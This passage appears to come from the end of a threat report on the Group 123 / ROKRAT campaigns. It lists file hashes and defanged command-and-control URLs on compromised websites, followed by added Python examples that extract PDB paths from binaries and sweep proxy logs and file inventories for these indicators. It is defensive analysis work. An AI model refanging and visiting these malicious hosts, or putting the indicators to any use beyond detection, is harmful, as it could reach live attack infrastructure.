6c372f29615ce8ae2cdf257e9f2617870c74b321651e9219ea16847467f51c9f** **Dropped #4: 19e4c45c0cd992564532b89a4dc1f35c769133167dc20e40b2a41fccb881277b** **Dropped #5: 3a0fc4cc145eafe20129e9c53aac424e429597a58682605128b3656c3ab0a409** **Dropped #6: 7d8008028488edd26e665a3d4f70576cc02c237fffe5b8493842def528d6a1d8** **Unpacked #1: 7e810cb159fab5baccee7e72708d97433d92ef6d3ef7d8b6926c2df481ccac2f** **Unpacked #1: 21b098d721ea88bf237c08cdb5c619aa435046d9143bd4a2c4ec463dcf275cbe** **Unpacked #1: 761454dafba7e191587735c0dc5c6c8ab5b1fb87a0fa44bd046e8495a27850c7** **Unpacked #1: 3d442c4457cf921b7a335c0d7276bea9472976dc31af94ea0e604e466596b4e8** **Unpacked #1: 930fce7272ede29833abbfb5df4e32eee9f15443542434d7a8363f7a7b2d1f00** **Unpacked #1: 4b20883386665bd205ac50f34f7b6293747fd720d602e2bb3c270837a21291b4** **Unpacked #1: f080f019073654acbe6b7ab735d3fd21f8942352895890d7e8b27fa488887d08** **Network:** ----- **- www[.]imuz[.]com/admin/data/bbs/review2/board/123.php** **- www[.]imuz[.]com/admin/data/bbs/review2/board/02BC6B26_put.jpg (where 02BC6B26 is** **randomly generated)** **- www[.]wildrush[.]co[.]kr/bbs/data/image/work/webproxy.php** **- www[.]wildrush[.]co[.]kr/bbs/data/image/work/02BC6B26_put.jpg (where 02BC6B26 is** **randomly generated)** **- www[.]belasting-telefoon[.]nl//images/banners/temp/index.php** **- www[.]belasting-telefoon[.]nl//images/banners/temp/02BC6B26_put.jpg (where 02BC6B26 is** **randomly generated)** **- www[.]kgls[.]or[.]kr/news2/news_dir/index.php** **- www[.]kgls[.]or[.]kr/news2/news_dir/02BC6B26_put.jpg (where 02BC6B26 is randomly** **generated)** ### "Are You Happy?" 
Campaign: **Wiper sha256: 6332c97c76d2da7101ad05f501dc1188ac22ce29e91dab6d0c034c4a90b615bd** ### "FreeMilk" Campaign: **Office sha256: f1419cde4dd4e1785d6ec6d33afb413e938f6aece2e8d55cf6328a9d2ac3c2d0�** **HTA sha256: a585849d02c94e93022c5257b162f74c0cdf6144ad82dd7cf7ac700cbfedd84f** **JS sha256: 1893af524edea4541c317df288adbf17ae4fcc3a30d403331eae541281c71a3c** **PoohMilk sha256:** **35273d6c25665a19ac14d469e1436223202be655ee19b5b247cb1afef626c9f2** **Freenki sha256: 7f35521cdbaa4e86143656ff9c52cef8d1e5e5f8245860c205364138f82c54df** **Freenki 2016: 99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5** **Network:** **- hxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]** **- hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg** **- hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg** **- hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp** **- hxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.php�** ### "North Korean Human Rights" Campaign: **Maldoc sha256: 171e26822421f7ed2e34cc092eaeba8a504b5d576c7fd54aa6975c2e2db0f824** **Dropper #1: a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037** **Dropper #2: eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14** **Dropper #3: 9b383ebc1c592d5556fec9d513223d4f99a5061591671db560faf742dd68493f** **ROKRAT:: b3de3f9309b2f320738772353eb724a0782a1fc2c912483c036c303389307e2e** ----- **Maldoc sha256: f068196d2c492b49e4aae4312c140e9a6c8c61a33f61ea35d74f4a26ef263ead** **PNG : bdd48dbed10f74f234ed38908756b5c3ae3c79d014ecf991e31b36d957d9c950** **ROKRAT:: 3f7827bf26150ec26c61d8dbf43cdb8824e320298e7b362d79d7225ab3d655b1** **Network:** **- hxxp://60chicken[.]co[.]kr/wysiwyg/PEG_temp/logo1.png** ### R E F E R E N C E S **[http://blog.talosintelligence.com/2017/02/korean-maldoc.html](http://blog.talosintelligence.com/2017/02/korean-maldoc.html)** 
- http://blog.talosintelligence.com/2017/04/introducing-rokrat.html
- http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html
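The PDB Paths section above shows why the compiler artifact is worth hunting for: the Group 123 binaries share a "version NN" build directory, a "T+M" project folder, and a handful of project names (DocPrint, DogCall, ErasePartition). The following is an added example, not code from the Talos post or from Group 123's tooling. It scans a PE image for the CodeView RSDS record that MSVC writes into the debug directory, pulls out the GUID, age and PDB path, and flags paths that match those indicators. The indicator regexes are this example's assumption derived from the four paths quoted above, and SAMPLE_IMAGE is a constructed stand-in for a real binary so the script runs offline.

```python
"""Pull CodeView PDB paths out of a PE image and flag the Group 123 naming pattern.

Added example, not code from the Talos post. The indicator regexes are an
assumption derived from the four PDB paths quoted in the "PDB Paths" section,
and SAMPLE_IMAGE is a constructed stand-in for a real binary.
"""
import re
import struct
import uuid
from typing import Dict, List

# MSVC writes a CodeView "RSDS" record into the PE debug directory:
#   "RSDS" (4 bytes) | GUID (16 bytes, little-endian fields) | age (u32) | PDB path (NUL-terminated)
RSDS_MAGIC = b"RSDS"
RSDS_HEADER_LEN = 4 + 16 + 4

# Indicators assumed from the paths in the post: a "version NN" build directory,
# a "T+M" project folder, and the three project names that were observed.
VERSION_DIR = re.compile(r"\\version \d+\\", re.IGNORECASE)
TM_DIR = re.compile(r"\\T\+M\\", re.IGNORECASE)
KNOWN_PROJECTS = re.compile(r"\\(DocPrint|DogCall|ErasePartition)\.pdb$", re.IGNORECASE)


def _plausible_path(raw: bytes) -> bool:
    """Printable ASCII, MAX_PATH-sized, ending in .pdb: filters random 'RSDS' hits."""
    return (0 < len(raw) <= 260
            and all(0x20 <= c < 0x7F for c in raw)
            and raw.lower().endswith(b".pdb"))


def extract_pdb_paths(data: bytes) -> List[Dict]:
    """Return every plausible RSDS record in `data` as {offset, guid, age, pdb_path}.

    A raw byte scan is used instead of walking IMAGE_DIRECTORY_ENTRY_DEBUG so the
    same code works on packed or truncated samples whose headers no longer point
    at the record.
    """
    records = []
    pos = data.find(RSDS_MAGIC)
    while pos != -1:
        if pos + RSDS_HEADER_LEN <= len(data):
            guid = uuid.UUID(bytes_le=data[pos + 4:pos + 20])
            (age,) = struct.unpack_from("<I", data, pos + 20)
            start = pos + RSDS_HEADER_LEN
            end = data.find(b"\x00", start)
            raw_path = data[start:end if end != -1 else len(data)]
            if _plausible_path(raw_path):
                records.append({"offset": pos, "guid": str(guid), "age": age,
                                "pdb_path": raw_path.decode("ascii")})
        pos = data.find(RSDS_MAGIC, pos + 1)
    return records


def classify_pdb_path(path: str) -> List[str]:
    """Return the Group 123 indicators that `path` matches; an empty list means no match."""
    hits = []
    if VERSION_DIR.search(path):
        hits.append("version-NN build directory")
    if TM_DIR.search(path):
        hits.append("T+M project folder")
    if KNOWN_PROJECTS.search(path):
        hits.append("known project name (DocPrint/DogCall/ErasePartition)")
    return hits


def make_rsds(path: str, guid: uuid.UUID, age: int) -> bytes:
    """Lay out an RSDS record the way the linker does (used only to build the fixture)."""
    return RSDS_MAGIC + guid.bytes_le + struct.pack("<I", age) + path.encode("ascii") + b"\x00"


# Constructed stand-in for a PE image: header bytes, two debug records separated by
# padding, and a stray "RSDS" with no path behind it. The first path is the one the
# post quotes from the "Evil New Year" ROKRAT; the second is a made-up benign path.
SAMPLE_IMAGE = (
    b"MZ" + b"\x90" * 62
    + make_rsds(r"e:\Happy\Work\Source\version 12\T+M\Result\DocPrint.pdb",
                uuid.UUID("11111111-2222-3333-4444-555555555555"), 3)
    + b"\xcc" * 17
    + make_rsds(r"C:\build\agent\Release\updater.pdb",
                uuid.UUID("aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"), 1)
    + b"RSDS" + b"\x00" * 30
)


def scan(data: bytes = SAMPLE_IMAGE) -> List[Dict]:
    """Extract the records in `data` and attach the indicator hits to each."""
    results = []
    for rec in extract_pdb_paths(data):
        rec["indicators"] = classify_pdb_path(rec["pdb_path"])
        results.append(rec)
    return results


if __name__ == "__main__":
    for rec in scan():
        verdict = "SUSPECT" if rec["indicators"] else "benign"
        print(f"{rec['offset']:#06x} age={rec['age']} {rec['pdb_path']} -> {verdict} {rec['indicators']}")
```

Point `scan()` at the bytes of a real sample to use it outside the fixture. The three indicators are deliberately scored separately: a "version NN" directory alone is weak (many developers name build trees that way), while a path that also carries the T+M folder or one of the observed project names is much stronger, and the caller can decide how many hits justify an alert. The GUID and age are kept because they pair a binary with a specific PDB build, which is useful when clustering samples across the campaigns.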
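The IOC section prints its network indicators defanged (hxxp, [.]), marks one path component as a randomly generated per-victim token (02BC6B26) and one query value as a placeholder ([base64_data]), and lists "safe URLs" that ROKRAT fetches but that are legitimate content. A sweep over proxy logs has to undo the defanging and widen those placeholders rather than match them literally. The following is an added example, not code from the Talos post; it refangs a subset of the URLs above into regexes, runs them over constructed proxy log lines, and checks a constructed file inventory against three of the post's SHA-256 hashes. The log lines and the inventory are invented for the example.

```python
"""Sweep a proxy log and a file-hash inventory for the Group 123 indicators above.

Added example, not code from the Talos post. The IOC strings are copied from the
IOC section (defanged as printed); the proxy log lines and the file inventory are
constructed here so the script runs offline.
"""
import re
from typing import Dict, List
from urllib.parse import urlsplit

# Network indicators as the post prints them: hxxp/hxxps schemes, [.] in hostnames,
# a per-victim 02BC6B26 token and a [base64_data] query placeholder.
MALICIOUS_URLS = [
    "hxxp://discgolfglow[.]com/wp-content/plugins/maintenance/images/worker.jpg",
    "hxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpg",
    "www[.]kgls[.]or[.]kr/news2/news_dir/index.php",
    "www[.]kgls[.]or[.]kr/news2/news_dir/02BC6B26_put.jpg",
    "hxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]",
    "hxxp://60chicken[.]co[.]kr/wysiwyg/PEG_temp/logo1.png",
]

# File hashes from the post, labelled with the campaign they belong to.
KNOWN_SHA256 = {
    "6332c97c76d2da7101ad05f501dc1188ac22ce29e91dab6d0c034c4a90b615bd": 'wiper ("Are You Happy?")',
    "7f35521cdbaa4e86143656ff9c52cef8d1e5e5f8245860c205364138f82c54df": 'Freenki ("FreeMilk")',
    "3f7827bf26150ec26c61d8dbf43cdb8824e320298e7b362d79d7225ab3d655b1": 'ROKRAT ("Evil New Year 2018")',
}


def refang(ioc: str) -> str:
    """Undo the defanging used in the post so the indicator can be matched against real traffic."""
    return (ioc.replace("hxxps://", "https://")
               .replace("hxxp://", "http://")
               .replace("[.]", ".")
               .replace("[:]", ":"))


def ioc_to_regex(ioc: str) -> "re.Pattern[str]":
    """Turn one printed URL indicator into a regex over full request URLs.

    Scheme-less entries get http:// so urlsplit sees a host; the 02BC6B26 token is
    widened to any 8 hex digits because the post says it is generated per victim;
    the query string is dropped and replaced by an optional wildcard because the
    post shows it as [base64_data]. The trailing lookahead stops index.php from
    also matching index.php.bak.
    """
    url = refang(ioc)
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    host = re.escape(parts.hostname)
    path = re.escape(parts.path).replace("02BC6B26", "[0-9A-Fa-f]{8}")
    return re.compile(rf"https?://{host}{path}(?:\?\S*)?(?=\s|$)", re.IGNORECASE)


# Constructed proxy log (timestamp, client, method, URL, status). Line 3 is one of the
# post's "safe URLs": ROKRAT fetches it, but it is legitimate content and is not alerted on.
SAMPLE_PROXY_LOG = """\
2018-01-03T09:12:44Z 10.0.3.17 GET http://www.kgls.or.kr/news2/news_dir/7F03A1C9_put.jpg 200
2018-01-03T09:12:45Z 10.0.3.17 GET http://www.kgls.or.kr/news2/news_dir/index.php 200
2018-01-03T09:13:02Z 10.0.3.22 GET https://www.amazon.com/Men-War-PC/dp/B001QZGVEC/EsoftTeam/watchcom.jpg 200
2018-01-03T09:14:10Z 10.0.3.40 GET http://old.jrchina.com/btob_asiana/udel_calcel.php?fdid=QUJDREVG 200
2018-01-03T09:15:00Z 10.0.3.51 GET http://intranet.example.local/news2/news_dir/index.php 200
2018-01-03T09:16:31Z 10.0.3.17 GET http://discgolfglow.com/wp-content/plugins/maintenance/images/worker.jpg 200
"""

# Constructed endpoint inventory (path -> sha256); the second digest is made up.
SAMPLE_INVENTORY = {
    r"C:\Users\kim\AppData\Local\Temp\ErasePartition.exe":
        "6332C97C76D2DA7101AD05F501DC1188AC22CE29E91DAB6D0C034C4A90B615BD",
    r"C:\Windows\System32\notepad.exe":
        "0000000000000000000000000000000000000000000000000000000000000000",
}


def scan_log(log_text: str = SAMPLE_PROXY_LOG, iocs: List[str] = MALICIOUS_URLS) -> List[Dict]:
    """Return one hit per log line that requests a known URL: {line, client, ioc}."""
    patterns = [(ioc, ioc_to_regex(ioc)) for ioc in iocs]
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        fields = line.split()
        for ioc, pattern in patterns:
            if pattern.search(line):
                hits.append({"line": lineno, "client": fields[1], "ioc": ioc})
                break  # one alert per request is enough
    return hits


def check_hashes(inventory: Dict[str, str] = SAMPLE_INVENTORY) -> List[Dict]:
    """Return {path, label} for every file whose SHA-256 is in the post's list (case-insensitive)."""
    return [{"path": path, "label": KNOWN_SHA256[digest.lower()]}
            for path, digest in inventory.items() if digest.lower() in KNOWN_SHA256]


if __name__ == "__main__":
    for hit in scan_log():
        print(f"line {hit['line']}: {hit['client']} -> {hit['ioc']}")
    for hit in check_hashes():
        print(f"{hit['path']}: {hit['label']}")
```

Because the C2 lives on compromised legitimate sites, matching on hostname alone would page the team every time someone reads the KGLS news pages; anchoring on the full path (and on the random-token pattern for the per-victim upload name) keeps the alert specific to the implant's requests. The "safe URLs" are intentionally left out of the indicator list; they are only useful as supporting context once a host has already matched a malicious URL.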